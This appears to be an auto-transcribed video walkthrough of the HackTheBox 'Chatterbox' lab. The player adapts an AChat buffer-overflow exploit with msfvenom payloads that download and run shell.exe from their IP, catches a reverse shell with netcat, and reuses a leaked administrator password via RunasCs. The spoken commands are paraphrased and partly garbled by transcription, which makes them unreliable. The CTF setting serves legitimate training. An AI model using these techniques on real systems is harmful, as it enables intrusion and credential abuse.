Hey, what's up, everyone, and welcome back to another episode of Naked CTF. In this series, I'll attempt to compromise and own a server from HackTheBox. It's my first attempt. I've not solved it beforehand nor read anything about it. It's one take with no editing, so this could be 3 hours or 30 minutes or 3 hours. So let's go. Today we're doing Chatterbox, which is a Windows medium. I thought we might have a crack at a medium, been doing a lot of the easy ones, and even though I've needed some hints and stuff along the way, thought it's time to do a bit of a self-challenge. So as always, we will get ourselves organized with the help of some shell automation. So that's going to be CTF prep, CTF, HTTP, Chatterbox, and then the IP, which is that, sets up our environment, gets everything organized, find the thing here, our notes, and we're good to go. So we can start our recon straight away. All right. So let's see. Ping scan done. A couple of ports open, some of the ones that you would expect on Windows 445, 135, 139. We might as well just get these kind of set up while we're going. 135, 139. Sorry, 139 TCP, 445 TCP. 135. And okay, so while that's doing the service discovery, so we've got those first three. Maybe clump some of these together. 491155, 49152. TCP, I think they're going to be RPC services. 9255 TCP, 49156 TCP. 256 49157 49154 49153. Again, probably RPC services. Let's see what the map has to say. So all in all, quite a bit. 11 different services to enumerate and see if we can find a way to gain a foothold. Again, this is a Windows box. Season 6 has just started. I did have a crack on the first box for Season 6, which was called Resource, I think. Still kind of like part of the way through it. It's a little tricky. I think I've found a foothold, but I can't quite get it to work. But yeah, that's a medium box as well. So hopefully this one is not quite as difficult as the Season 6 medium that I'm dealing with at the moment, because it's quite tricky. So I'm just going to shrink all this. Grab all of this. Okay. Paste it in here. Let's make this readable again. And let's go through and just clean some of this up. So we can get rid of a lot of these filtered. I mean, it's good to know the filtered ones, because that means it's probably a service that's running on the local host, or possibly running on the local host, but it may be deliberately firewalled off from the, internet facing or VPN facing adapter at this point. So I'm just going to cut all these out because there's not a lot we can do apart from just acknowledge that we've got that information. And let's put that there. One more set to go. And yeah, so we'll definitely hang on to that. Good information. All of this we can dump. Don't need this. And let's just put some line breaks in. Okay, so the fingerprinting has determined this is Windows 7 Professional. which for HackTheBox and CTF, sometimes they use professional, Windows 7 professional rather than a Windows Server edition, just because of, you know, licensing and all that sort of stuff. So sorry, I'm just looking at these results. So I think we can just kind of ignore the 4.9 series host for now. So what I'm going to do is get all the 4.9s together and put them down here. And we're going to just assume that these are all RPC related services. And, you know, we'll definitely dig into them and enumerate them if possible, but I'd just like to focus on the other stuff for now. Like, one of the more obvious ones is SMB is open. No, NetBIOS session. Okay, so we've only got one half of that. Okay. So SMB doesn't find anything particularly interesting. Message signing enabled, but not required. Okay, so that could be interesting. We could have a SMB1 vulnerability here. Security mode. Message signing disabled, dangerous but default. Okay. So let's park this here. Under 139. Investigate NetBIOS session 9255. Is unknown service. Well, it's TCP wrapped, so that means it's definitely being filtered. Okay, good to know. Nmap TCP wrapped. Behavior of the port is consistent with one that's been protected by a TCP wrapper, host-based network access control, like Windows Firewall. And then filtered is different again, but okay. So I think what we might do is just do some basic SMB enumeration, NBT scan IP, not a lot, Nmap, script, NBT, nbstat.nsc, see what the Nmap script has to say. And then we'll check if there's any shares available, but I would have expected it to turn up in the Nmap recon if that was the case. 135.139.445. Okay. What about SMB client -L? No workgroup available. Can we specify the workgroup? Client help. NetBIOS name, NetBIOS scope, workgroup, -W. Okay, so let's try this again with -W. And then our notes had a copy. Workgroup is workgroup. Okay, so maybe we need to do the anon session, which is SMB client. SMB client, I forgot the syntax. Null session, null login. Put good old hack tricks. 139455. Yeah, this one. Minus H IP null user. Minus H IP. We definitely don't need to specify the work group. No. Let's SMB map. Ah, okay. SMB client, no pass. No pass, minus L. Let's try it again. Reconnecting with SMB1 for workgroup listing. How's SMB map looking these days? So it's able to connect. Unable to grab any information. We could try enum for Linux. See what comes up. Find work group or domain. Scroll back. Okay. Just unable to enumerate anything at all because okay. Yeah, so not a lot there. Let's go back here and do. Sorry, let's go back here and do these two guys together. SMB. Nothing obvious that can be enumerated or connected to. Okay. About HackTheBox 135 RPC. Okay. Say interface, directory services interface, remote registry, service control. All right. 135. So SMB is really the only service per se that's open. All of these are filtered. SMB vulnerability Windows 7 blue. Okay. Is it eternal blue? Windows 7 SP1. What was the build number? 7601. 7601. Yeah, okay. Target is vulnerable. Yeah, let's run the Nmap vulnerability scripts. SMB vulnerability scripts. So Nmap script SMB vuln star IP. This is all of the NSC scripts that Nmap knows about that looks for and checks a particular vulnerability within SMB, and according to what I'm reading, we should find that this box is can be targeted with external blue, which is a really old vulnerability. US 17010. Let's try that specific script. Do we have the vulnerability script for 17010? It will complain if we don't. Yeah, it's not saying that we're explicitly vulnerable, right? So this is using Metasploit and the Perpetrator. Well, this is a write-up for okay, this guy has built his own custom lab. Really cool. Okay, but according to the OS version, it would be vulnerable. But we have some sort of configuration that seems to be mitigating that particular vulnerability. So let's grab like one of the errors that get returned and see if there's a way around it. Okay. Yeah, you see the Nmap NSC script is identifying it as vulnerable. 17010, which is eternal blue. In packet, or you can use Conda. Hold onto that. Look here. That's cool. So, yeah, there's something about the SMB configuration that 1, 2, 3, 4, 5, 6, 7, 8, 9. Nope. What have we done? What have I done? Is it including these filtered ones? Is it 11? My goodness. Just quickly run this again. So I think it gives us a total of listing ports at the top. I'm just wondering whether it only is counting the open or if it's counting these in filtered and TCP wrapped state. That would be 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11. Yeah, 11 services. One, 2, 3, 4, 5, 6, 7, 8, 9. So it's either 9 or 11 if we include these two. Or it's 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29. 29 plus 11 is 40, but that's not listening. Scan the host with nmap. Yeah, that's what I've done, buddy. 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11. It's possible we might need to go for a UDP scan as well. Which I haven't done a whole lot of. Okay. UDP services. DNS, SNMP, etc. SU minus V. Nmap. SU minus V. We need sudo for UDP, then IP. See if that turns up anything. Moving too fast, it seems. 11 out of 11 drop probes. Okay. TCP ports. Oh, that's going to take forever. Not used guest. SMB client. User equals guest. SL. Account disabled. For minus A IP. Yeah, guest blank. Try this next. See if anything interesting turns up on the bind, RPC bind service. Okay. Query. Query. Display info. Huh. Metasploit. Be minus U guessed percent minus U. Okay, got that wrong. Minus U guessed no pass. Guessed percent null. Status log on failure. But how did the initial SMB okay, I mean it's saying it used guess, but didn't necessarily actually succeed. TCP ports. Jeez. 1, 2, 3, 4, 5, 6, 7, 8, 9. Just try these methodically. 9. And then these are open, 10 and 11. I'm going to do a basic nmap. One, 2, 3, 4, 5, 6, 7, 8, 9. 1074. 1074, IP is correct. Okay, a little bit lost here. Five, 6, 7, 8, 9, 10, 11. Back and look at my nmap command. So it's all ports, connect scan, versioning. Map, all ports, defaults. Nmap filtered. Okay, let's understand these port statuses a little bit more. Open, actively accepting TCP connections. Closed. It receives and responds to nmap probe packets, but there's no application listening on it. Filtered. Nmap cannot determine whether the port is open because packet filtering prevents its probes from reaching the port. Filtering can become dedicated firewall or host-based firewall. Unfiltered, port is accessible, nmap is unable to determine whether it's open or closed. Open and filtered. Okay. Closed and filtered. 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11. What am I doing wrong here? Ay, ay, ay. Scan the host with Nmap. Alright, getting a little bit flustered. Let's go back to trying to identify a vulnerability. So 139445. Reluctantly, I'm going to fire up Metasploit, MSF console, I should say. Metasploit scan SMB. Because I don't know what I'm missing here. So it's pipe auditor. SMB2. SMB enum shares. Enum users. SMB login. Login, look up SID. Version. Let's just start with this. Set G rhost equals rhosts 10, 10, 10, 74. Use aux scanner SMB, aux scanner SMB, SMB version. Show options. Run. Okay. Set our hosts 10, 10, 10, 74. Setting. Set our hosts 10, 10, 10, 74. Okay. Set G. Okay. Detected version 1 and 2. Preferred dialect 2.1. Signatures optional. QED authentication domain Chatterbox. Chatterbox. Host is running SMB detected. Alright, let's just start dumping this. So we've got some potentially some info that we can piece together. Right, what do we want to run next? Don't have username and password. We don't have anything to brute force. Enum users, no. Well, let's try it. Use aux scanner series SMB enum users. Show options. Run. Nothing. Like I thought. So I'm wondering if we can do like a responder type attack. In the sense that there's something that we can get, something that we can trigger in order to get a hash sent back to us somehow. Let's have a look at this pipe order. Run. Yeah, it's not getting anything because it's just going to get NT unauthorized. Okay. NT status access denied. Legacy is one that we've already done. So we've already done the Eternal Blue exploit in the past, right? Like on an easy box. So on the surface, this Windows build should be vulnerable to Eternal Blue, but it appears the SMB config is locked down enough that we can't use it for a foothold. So let's turn our attention elsewhere. Even though I still can't figure out the right number of listening TCP ports. So we've got just RPC to look at. It didn't find any website, didn't find any application. Windows port 9255. Is that WMI? Yeah, I think it's Manager on Network. I feel like we have to do the UDP scan. Minus SU. Map UDP. SU. Let's just do the top 100. SU minus V. So in nmap udp.txt and then the IP. Oops, sudo. Let's let that go. Maybe there is something on the. I don't know. This would be a first, right? Like in all of the CTF exercises on HackTheBox, don't really encounter USB services. T2 timing. See if that helps. Yeah, it seems that UDP packets are getting dropped. Anyway, we'll let that go. See if it turns anything up. Okay, and then we've got let's have a look. Use auxiliary scanner SMB. SMB, well, we can try this. Oops. use AUX scanner SMB MS17010. Go options. Run. Host does not appear vulnerable. Probably because it can't make the necessary connection. Okay, SMB scanning is slow. What else we got? RPC. DC RPC. Let's try that. DCE RPC endpoint mapper. Options. Run. Okay, interesting. So all the RPC services, right? LSA, LSS. Yeah, like this one, right? Event log, TCP IP. Now you would expect that this would give you the actual port that that particular RPC service is listening on. The pipe ones, I understand you wouldn't have a port, but the TCP ones, I would expect you would see a port number. DHCP V6. Security center. Okay. Is DFS coerce? DFS distributed file system. I think that's an actual exploit. Right. I have no shame. I'm going to open the walkthrough because, okay, I'm not getting anywhere. PowerShell, modifying publicly available exploits. Okay, basic PowerShell reverse shell techniques. Enumerating Windows registry. Cool. Okay. 9255, 9256. Open. A chat. Now, why is it open in this nmap scan, but TCP wrapped? So I guess I need to go back and revisit TCP wrapped. How to bypass TCP route. Huh. So if we were to go to here, 9255. HTTP. HTTPS. Not secure. 9255 HTTP HTTP. Huh, well, it only finds 2 ports. So if I was to put 2 into guided mode. Oh man, okay. So something a little bit busted with this box. So AChat is our vector, so to speak. Search, search, exploit, AChat. Minus M 360. Oops. 36025. Vim 36025. Okay, so it can send a payload, buffer overflow, Windows 7 32-bit. Don't actually have the architecture where it's 32 or 64. But here's a lot of shellcode. And it's running on UDP. So did UDP turn anything up? Still going. What we could do is nmap minus su, and then p is 925. What was it? 9255 and 9266. Closed. HAT buffer overflow. It's possible to generate shellcode for use in the above object. Above exploit the command msfn. Okay, so we need to create a PowerShell shellcode. So the shellcode will download this script, and then it'll pack it with this shellcode, which okay, right. Let's just stay on foothold. 36025. Yep, same exploit. So I'm assuming we'll get bytecode out of MSF Venom. And then we replace this buffer. And then we will... 9256 seems to be closed. And then we need a PowerShell RevShell script. Okay, so let us try and generate this MSF Venom, Venom minus A x86, so it's not 64-bit. Platform, Windows, minus P, Windows, exec, this is the basic payload. It's almost like a staged payload. CMD equals PowerShell PowerShell http:// then my IP 10.10.14.25 shell okay, so it downloads and executes it. Yeah, so it doesn't matter what this is called. shell.ps1. Then we need the rest of this. Keep doing that. Single quote. Yep. Okay. That's all messed up because it's got too many line breaks. Let's just do it in here. Full screen. PowerShell slash. Yep. 10.10. 25, 8,000. Right, so we go. Attempting to encode payload with one iteration of x86 Unicode mixed. x86 Unicode mixed failed with encoding due to a bad character. I think it might have been missing a space there. Index 41. Okay. 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, XA7. Hmm. X86 Unicode mixed. Let's try Unicode. I don't know. Kind of grasping at straws here. I know roughly what's going on, but yes. Okay, that succeeded. Outputting raw payload. Well, I sure hope that that doesn't affect it, but let's see. Vim, this guy. Now we're going to do... Excuse my lack of via shortcut skills to do this all at once. Oops. Why am I even doing this? We can just get rid of that. And then our server address is going to be 10, 10, 10, 74. 9256. That's all the overflow payload, so we don't want to mess with that. And I'll be really curious if this works because the Nmap scan said that the 9256 UDP port was closed. So, I don't know. Let's see. Oh man, which Python version is this? Probably 2. Oh, we didn't even start a web server. So that's going to be 33 http.server. There. And then again, see if we get a hit on the web server. Nothing. Okay. Let's see if we can troubleshoot this Unicode problem. MSF Venom. Oops. $8,000. So we should see that URL hit. X86 bad character. MSF Venom. So that's a different issue. Okay, here's the guy who had the same problem. Yeah, you see there's just 2 ports open in the machine. These pretty much tell you... So why did my TCP scan throw up? Why did my Nmap throw up like so many different things, right? Like SMB and everything else. I'm going to reboot this. Oh no. There are no available machines in the current lab. Six. So let's go back to this guy. Yeah, I'm a little bit disappointed. This is really throwing me off. Like, if I had got an Nmap result that just had a chat, I definitely wouldn't have spent the last hour or so screwing around with SMB and RPC and everything else, right? Non-Metasploit, yeah. Why are there so many bad characters? Why EAX? What do I need to... This fucking coder. Buffer can the payload that I generate can't exceed 1152 characters. Oh, but this guy's using a Metasploit one. Not the standalone exploit. SE x86 Unicode mixed. this guy ended up using certutil to download it. Okay, let's try this rather than, yeah. Ten, 14, 25, shell.exe, shell.exe. This is the destination path, so it'll be writ, and then actually run the shell. Let's see if this works. Okay. And that was with the Unicode mixed encoder. So let's grab this. Right. So let's grab this. Except we didn't specify a port, did we? So let's try again. Grab our new payload. And we're going to stick it in the export script. Like this. Drop this in. And again, let's make sure we've got our server up and running. Let's see if we get a hit. And 2. Hey, there we go. Okay, that payload works. Cool. So now we want a reverse shell exe. Okay, so what we'll do is look up MSF Venom cheat sheet. We want non-staged payloads, stageless. Reverse shell TCP, yep, so it's MSF Venom -P Windows / reverse shell TCP. L host is going to be ARS10101425. L port is going to be 1337. -F exe type 2 shell.exe. on my other terminal. Oh, Windows reverse shell TCP. Windows shell reverse TCP. Windows shell reverse TCP. We will run netcat nvl. Let's go into bash first. Netcat nvlp1237. Okay. We got shell.exe, a web server. Start a web server. Run the exploit. Okay, yeah, good. And do we have it? Yes, hello. Sure. Hello, hello. What is going on? Oh, it's the wrong one. Okay. Okay. Wrong payload. We want stageless x86 Windows shell reverse TCP Windows shell. Thought that sounded wrong. Actually, let's delete shell.exe, just make sure we're not appending it. And again. And let's run our web server. Go back here, rerun the exploit. Did we get it? Oh, we didn't have to listen already. Oh my goodness. Let's try again. Luckily, it's reliable buffer overflow, it looks like. I have a feeling that sometimes you need to change port numbers on each attempt. IAM shell.exe 10.10.14.25, yep, 1338. Because the previous instance is still maybe bound to that port. I don't know. Something screwy. Run it again. Got the hit. No connection. So this guy did a PowerShell payload. Windows shell. Let's try being explicit with x86. shell.exe. x86. Look at this. So he creates the payload. Rather than trying to stage it. Yeah, okay, this kind of makes more sense. 10, 10, 14, 25, 4, 1, 2, 3, 9. Let's try this payload. Copy. Him. By sending that. And that was with 1339. 339. Okay, listener is there. Go. No need to stage anything. There we go. Who am I? Alfred. The flag before anything else. Alfred, where is the flag? Come on. Desktop. Oh. Okay. Alfred. Let's try and get a hint. Oh, what is the administrator user's password? Should we do some enumeration on the box, see if we can find it? Yeah, let's do that. Okay, so we're going to go to here. We're going to copy WinPeas to here, peas.exe. We're going to launch our web server again, and then we're going to do the old cert util, oh my god, what is it, -f split Earl cache http 1010 1425 8000 peas.exe, and then write it to local directory peas.exe. What? Oh my goodness. It would help us in the actual... Oh. Okay, I'm officially starting to lose it. Okay, there we go. See what the P's have to say. It's slower than normal. Maybe just sit back, relax, and enjoy the tunes while this runs, because I think it might be a few minutes. Lots of hot fixes. Okay. UAC prompt for non-Windows binaries. Dang it. No PowerShell history. We can mess with anything on the file system, C drive, pen data, create directories. Security packages. Okay. That seems bad. I don't exactly know what it is, but we know signing is not required. Event log. Password doesn't expire. Guest is disabled. Administrator is the user that we want. It's enabled. Huh? All access to administrator. Okay. Auto log on. So that creates a interactive session when the VM starts up. Okay. There's always a bunch of these. Before we go any further, I want to check this out, see if it's real. See if HackTheBox has anything on it. Introduced, I've never heard of WDigest before. Introduced with Windows XP is designed for authentication via HTTP and is enabled by default on Windows XP through Windows 8. This default setting results in plain text password storage in the LSASS. An attacker can use Mimikatz to extract these credentials by using blah. But do you need an admin user? Mimikatz. Mimikatz. WDigest. How does it work? Alright, this guy is actually reverse engineering Probably a little bit hardcore for what I'm looking for. So it looks like Mimi Cats with this. But I just don't want to go through the bother of uploading Mimi Cats and running it if it requires certain privileges that I don't have. Digest. So we should probably check if we have SE debug. Right, let's just go through the rest of this. See if there's anything else that's obvious. Looks like you can modify and or stop some services. Create subkey. Okay, so that starts a chat. Writable folders. Drivers, network. More permissions. There's our NTLM hash for Alfred. Okay. Okay, so yep. This guy ran peas. Yep. So yeah, the permissions on C users administrator is wonky, which gives you the flag, right? Oh, okay. So we try and reuse the password, right? So what we'll want to do is grab. I'll do it. Try a different way to what this guy's doing. We won't bother messing with the file permissions right now. We'll see if we can just get actually root or NT authority. So we want run as cs.zip to here. Unzip run as, yeah. Run as cs.exe, run as.exe. Okay, then we start the web server again. Go back to here. Go back to here. Cert util -f split URL cache HTTP 1010 14 25 8000 ra.exe, then ra.exe. Duh. ra.exe help. Run as RA administrator. Password was welcome1 exclamation. Welcome1 exclamation. CMD who am I all. Yeah. Administrator. Okay. So the password works. So we want to get a shell, right? .exe help. So let's just try ra.exe administrator welcome1 exclamation cmd -c cmd. Who am I? No. Did not work. Oh, dang it. Okay. Run that again. What we might do is create another listener, because I found this to work before. Which is to users Alfred desktop ra.exe help. Yeah, redirect to remote host. So we do ra.exe administrator welcome1 exclamation cmd.exe -r 1010 25 14.25 4444. No. Okay, let's try that again. team.exe administrator. Welcome 1. Team.exe minus R 10, 10, 14, 25, 44, 44. Who am I? There we go. Okay, my goodness. Administrator. Users administrator. Helps if I spell it correctly. Desktop. Type root.txt. There it is. Welcome 1. Oh man, okay, look, that was definitely a medium box, but I think that was made terribly more difficult for me by the fact that it appears to have deviated from baseline, and by baseline I mean, look, I'm not going to whinge and say this is the reason I couldn't get it done, but baseline has all these ports, TCP ports listing when you do an mmap, right? And 9255 and 9256, while they're TCP wrapped, I don't know, like in the official write-up PDF, when you look at the nmap scan they only have 9255 and 9256. That's the only ports that are reported, you know, all 65535 ports. And they're open and not TCP wrapped. So it kind of sent me on a 45 to 60 minute wild goose chase, trying to figure out what I should be looking at. If that was the only thing returned in nmap, of course I would have been hunting down some sort of vulnerability in HAT straight away. Now, the second part, which I think was quite, you know, slightly more difficult than an easy box, and is kind of justifies why it's a medium, is the exploit modification, right? So obviously the default payload here, pop to calc, great. But we obviously need a reverse shell. So, you know, at that point I was kind of a bit annoyed and just went down the path of looking through the a write-up that someone had done, and they'd done a really good job describing how they ended up at this particular payload, and the iterations that they went through with PowerShell and trying to download a script and execute that and everything else, and why this buffer register is important and everything else. So I'm going to go back and reread a lot of that. But like if I'd put my majority of my time into the development of this, I think I would have got there. Because I understand, you know, the concept that you use MSF Venom to generate this payload, whether it's like a command string, you know, and then a whole bunch of stuff after. But this shellcode is identical, so it starts at both ends XFF, both starts X00. So it's not like you have to modify this, right? It's not like you have to modify the actual shellcode. It's just about building the payload to get a reverse shell. And then similarly, I think I probably would have been able to get the password reuse attempt at some point. So yeah, look, all in all, it was fun, but it was pretty frustrating. Like I said, I thought we'd give a medium box a go. If I'd been able to just follow the guide here, it would have been, I think, a lot more straightforward. But, you know, I was putting in 11 and 41 and everything else when the answer was 2, but that doesn't reflect it all in my nmap output. So I'm not sure what's happened. Maybe I'll give some feedback. It does have a kind of lowish rating for for most machines. Makes me sick. The method of Privask is completely unconventional. Well, I mean, it's not unconventional on a Linux box, right? You always try all the credentials that you have, you know, and you get the credentials out of linps. This guy tried port forwarding. Unexpectedly, even I have seen all the ports in my first nmet scan except 9255, 9256, which is entirely different from the walkthroughs. Yeah, so if we could look at the walkthrough for Privask on here. So we didn't use PowerShell, but we found it via WinPs. Attempt to reuse this password. Now you can use this PowerShell kind of script or snippet, but I like that run as C# executable. It's been a real useful tool in some other labs and everything else. So yeah, look, all in all, a little bit frustrating, but it's been fun. Probably the first time I've been a little bit taken aback by some weird behavior within HackTheBox. So I'll definitely put some feedback in that this is seems to be deviated from baseline. So yeah. So look, if you stuck around to the end of this video, thank you very much. Have a great morning, afternoon, evening, or nighttime, whatever time it is for you. And I'll see you in the next video. Bye-bye.